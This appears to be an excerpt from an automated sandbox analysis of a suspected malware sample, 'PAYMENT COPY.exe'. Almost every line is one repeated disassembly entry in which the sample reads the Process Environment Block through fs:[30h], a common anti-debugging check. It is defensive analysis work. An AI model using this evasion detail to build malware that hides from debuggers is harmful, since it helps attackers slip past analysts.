                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100E443 mov eax, dword ptr fs:[00000030h]1_2_0100E443
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF45B1 mov eax, dword ptr fs:[00000030h]1_2_00FF45B1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF45B1 mov eax, dword ptr fs:[00000030h]1_2_00FF45B1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108A456 mov eax, dword ptr fs:[00000030h]1_2_0108A456
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C460 mov ecx, dword ptr fs:[00000030h]1_2_0105C460
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD2582 mov eax, dword ptr fs:[00000030h]1_2_00FD2582
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD2582 mov ecx, dword ptr fs:[00000030h]1_2_00FD2582
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108A49A mov eax, dword ptr fs:[00000030h]1_2_0108A49A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8550 mov eax, dword ptr fs:[00000030h]1_2_00FD8550
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8550 mov eax, dword ptr fs:[00000030h]1_2_00FD8550
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010044B0 mov ecx, dword ptr fs:[00000030h]1_2_010044B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105A4B0 mov eax, dword ptr fs:[00000030h]1_2_0105A4B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFE53E mov eax, dword ptr fs:[00000030h]1_2_00FFE53E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0535 mov eax, dword ptr fs:[00000030h]1_2_00FE0535
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C700 mov eax, dword ptr fs:[00000030h]1_2_0100C700
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01000710 mov eax, dword ptr fs:[00000030h]1_2_01000710
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C720 mov eax, dword ptr fs:[00000030h]1_2_0100C720
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C720 mov eax, dword ptr fs:[00000030h]1_2_0100C720
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104C730 mov eax, dword ptr fs:[00000030h]1_2_0104C730
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100273C mov eax, dword ptr fs:[00000030h]1_2_0100273C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100273C mov ecx, dword ptr fs:[00000030h]1_2_0100273C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100273C mov eax, dword ptr fs:[00000030h]1_2_0100273C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100674D mov esi, dword ptr fs:[00000030h]1_2_0100674D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100674D mov eax, dword ptr fs:[00000030h]1_2_0100674D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100674D mov eax, dword ptr fs:[00000030h]1_2_0100674D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012750 mov eax, dword ptr fs:[00000030h]1_2_01012750
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012750 mov eax, dword ptr fs:[00000030h]1_2_01012750
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E75D mov eax, dword ptr fs:[00000030h]1_2_0105E75D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4690 mov eax, dword ptr fs:[00000030h]1_2_00FD4690
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4690 mov eax, dword ptr fs:[00000030h]1_2_00FD4690
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107678E mov eax, dword ptr fs:[00000030h]1_2_0107678E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010847A0 mov eax, dword ptr fs:[00000030h]1_2_010847A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEC640 mov eax, dword ptr fs:[00000030h]1_2_00FEC640
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010507C3 mov eax, dword ptr fs:[00000030h]1_2_010507C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD262C mov eax, dword ptr fs:[00000030h]1_2_00FD262C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FEE627 mov eax, dword ptr fs:[00000030h]1_2_00FEE627
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E7E1 mov eax, dword ptr fs:[00000030h]1_2_0105E7E1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE260B mov eax, dword ptr fs:[00000030h]1_2_00FE260B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD47FB mov eax, dword ptr fs:[00000030h]1_2_00FD47FB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD47FB mov eax, dword ptr fs:[00000030h]1_2_00FD47FB
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E609 mov eax, dword ptr fs:[00000030h]1_2_0104E609
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF27ED mov eax, dword ptr fs:[00000030h]1_2_00FF27ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF27ED mov eax, dword ptr fs:[00000030h]1_2_00FF27ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF27ED mov eax, dword ptr fs:[00000030h]1_2_00FF27ED
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01012619 mov eax, dword ptr fs:[00000030h]1_2_01012619
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01006620 mov eax, dword ptr fs:[00000030h]1_2_01006620
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01008620 mov eax, dword ptr fs:[00000030h]1_2_01008620
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDC7C0 mov eax, dword ptr fs:[00000030h]1_2_00FDC7C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD07AF mov eax, dword ptr fs:[00000030h]1_2_00FD07AF
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A660 mov eax, dword ptr fs:[00000030h]1_2_0100A660
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A660 mov eax, dword ptr fs:[00000030h]1_2_0100A660
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109866E mov eax, dword ptr fs:[00000030h]1_2_0109866E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109866E mov eax, dword ptr fs:[00000030h]1_2_0109866E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01002674 mov eax, dword ptr fs:[00000030h]1_2_01002674
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8770 mov eax, dword ptr fs:[00000030h]1_2_00FD8770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0770 mov eax, dword ptr fs:[00000030h]1_2_00FE0770
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C6A6 mov eax, dword ptr fs:[00000030h]1_2_0100C6A6
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0750 mov eax, dword ptr fs:[00000030h]1_2_00FD0750
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010066B0 mov eax, dword ptr fs:[00000030h]1_2_010066B0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0100A6C7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A6C7 mov eax, dword ptr fs:[00000030h]1_2_0100A6C7
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0710 mov eax, dword ptr fs:[00000030h]1_2_00FD0710
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010506F1 mov eax, dword ptr fs:[00000030h]1_2_010506F1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010506F1 mov eax, dword ptr fs:[00000030h]1_2_010506F1
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E6F2 mov eax, dword ptr fs:[00000030h]1_2_0104E6F2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E6F2 mov eax, dword ptr fs:[00000030h]1_2_0104E6F2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E6F2 mov eax, dword ptr fs:[00000030h]1_2_0104E6F2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E6F2 mov eax, dword ptr fs:[00000030h]1_2_0104E6F2
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E908 mov eax, dword ptr fs:[00000030h]1_2_0104E908
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E908 mov eax, dword ptr fs:[00000030h]1_2_0104E908
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C912 mov eax, dword ptr fs:[00000030h]1_2_0105C912
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0106892B mov eax, dword ptr fs:[00000030h]1_2_0106892B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105892A mov eax, dword ptr fs:[00000030h]1_2_0105892A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01050946 mov eax, dword ptr fs:[00000030h]1_2_01050946
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4940 mov eax, dword ptr fs:[00000030h]1_2_010A4940
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C97C mov eax, dword ptr fs:[00000030h]1_2_0105C97C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0887 mov eax, dword ptr fs:[00000030h]1_2_00FD0887
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01074978 mov eax, dword ptr fs:[00000030h]1_2_01074978
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01074978 mov eax, dword ptr fs:[00000030h]1_2_01074978
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4859 mov eax, dword ptr fs:[00000030h]1_2_00FD4859
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD4859 mov eax, dword ptr fs:[00000030h]1_2_00FD4859
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010589B3 mov esi, dword ptr fs:[00000030h]1_2_010589B3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010589B3 mov eax, dword ptr fs:[00000030h]1_2_010589B3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010589B3 mov eax, dword ptr fs:[00000030h]1_2_010589B3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010669C0 mov eax, dword ptr fs:[00000030h]1_2_010669C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov ecx, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF2835 mov eax, dword ptr fs:[00000030h]1_2_00FF2835
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010049D0 mov eax, dword ptr fs:[00000030h]1_2_010049D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109A9D3 mov eax, dword ptr fs:[00000030h]1_2_0109A9D3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E9E0 mov eax, dword ptr fs:[00000030h]1_2_0105E9E0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010029F9 mov eax, dword ptr fs:[00000030h]1_2_010029F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010029F9 mov eax, dword ptr fs:[00000030h]1_2_010029F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C810 mov eax, dword ptr fs:[00000030h]1_2_0105C810
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDA9D0 mov eax, dword ptr fs:[00000030h]1_2_00FDA9D0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]1_2_0100A830
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107483A mov eax, dword ptr fs:[00000030h]1_2_0107483A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107483A mov eax, dword ptr fs:[00000030h]1_2_0107483A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD09AD mov eax, dword ptr fs:[00000030h]1_2_00FD09AD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD09AD mov eax, dword ptr fs:[00000030h]1_2_00FD09AD
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01000854 mov eax, dword ptr fs:[00000030h]1_2_01000854
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE29A0 mov eax, dword ptr fs:[00000030h]1_2_00FE29A0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066870 mov eax, dword ptr fs:[00000030h]1_2_01066870
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066870 mov eax, dword ptr fs:[00000030h]1_2_01066870
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E872 mov eax, dword ptr fs:[00000030h]1_2_0105E872
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105E872 mov eax, dword ptr fs:[00000030h]1_2_0105E872
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105C89D mov eax, dword ptr fs:[00000030h]1_2_0105C89D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF6962 mov eax, dword ptr fs:[00000030h]1_2_00FF6962
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF6962 mov eax, dword ptr fs:[00000030h]1_2_00FF6962
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FF6962 mov eax, dword ptr fs:[00000030h]1_2_00FF6962
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A08C0 mov eax, dword ptr fs:[00000030h]1_2_010A08C0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8918 mov eax, dword ptr fs:[00000030h]1_2_00FC8918
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FC8918 mov eax, dword ptr fs:[00000030h]1_2_00FC8918
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109A8E4 mov eax, dword ptr fs:[00000030h]1_2_0109A8E4
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C8F9 mov eax, dword ptr fs:[00000030h]1_2_0100C8F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0100C8F9 mov eax, dword ptr fs:[00000030h]1_2_0100C8F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104EB1D mov eax, dword ptr fs:[00000030h]1_2_0104EB1D
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01098B28 mov eax, dword ptr fs:[00000030h]1_2_01098B28
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01098B28 mov eax, dword ptr fs:[00000030h]1_2_01098B28
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD0AD0 mov eax, dword ptr fs:[00000030h]1_2_00FD0AD0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01084B4B mov eax, dword ptr fs:[00000030h]1_2_01084B4B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01084B4B mov eax, dword ptr fs:[00000030h]1_2_01084B4B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01078B42 mov eax, dword ptr fs:[00000030h]1_2_01078B42
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066B40 mov eax, dword ptr fs:[00000030h]1_2_01066B40
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01066B40 mov eax, dword ptr fs:[00000030h]1_2_01066B40
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0109AB40 mov eax, dword ptr fs:[00000030h]1_2_0109AB40
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0107EB50 mov eax, dword ptr fs:[00000030h]1_2_0107EB50
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]1_2_00FD8AA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD8AA0 mov eax, dword ptr fs:[00000030h]1_2_00FD8AA0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A2B57 mov eax, dword ptr fs:[00000030h]1_2_010A2B57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A2B57 mov eax, dword ptr fs:[00000030h]1_2_010A2B57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A2B57 mov eax, dword ptr fs:[00000030h]1_2_010A2B57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A2B57 mov eax, dword ptr fs:[00000030h]1_2_010A2B57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FDEA80 mov eax, dword ptr fs:[00000030h]1_2_00FDEA80
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FE0A5B mov eax, dword ptr fs:[00000030h]1_2_00FE0A5B
